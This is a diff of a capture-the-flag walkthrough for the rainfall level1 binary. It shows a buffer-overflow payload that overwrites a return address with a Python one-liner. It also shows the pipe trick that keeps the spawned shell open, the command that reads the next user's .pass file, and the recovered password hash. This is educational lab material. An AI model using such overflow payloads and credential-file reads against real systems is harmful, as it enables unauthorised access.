postCC42/rainfall/level1/walkthrough.md

 - we create a file containing 76 char + the address of run function reversing it (for little endian):
 `python -c 'print"a"*76+"\x44\x84\x04\x08"' > /tmp/exploit`
 - we pass the `exploit` file as argument to `./level1`and we get a response `Good...
 Wait what?`but after that a segfault.
-- we have to find a way to keep the stdin open after cat reads from the file, ensuring the program doesn't crash when system tries to read from it: `cat /tmp/exploit - | ./level`
+- we have to find a way to keep the stdin open after cat reads from the file, ensuring the program doesn't crash when system tries to read from it: `cat /tmp/exploit - | ./level1`
 ## Solution
 - this way the prompt is returned to us and we can try to cat the .pass of level2:
 ```
+`cat /tmp/exploit - | ./level1`
 Good...
 Wait what?
-whoami
+> whoami
 level2
-cat /home/user/level2/.pass
+> cat /home/user/level2/.pass
 53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77
 ```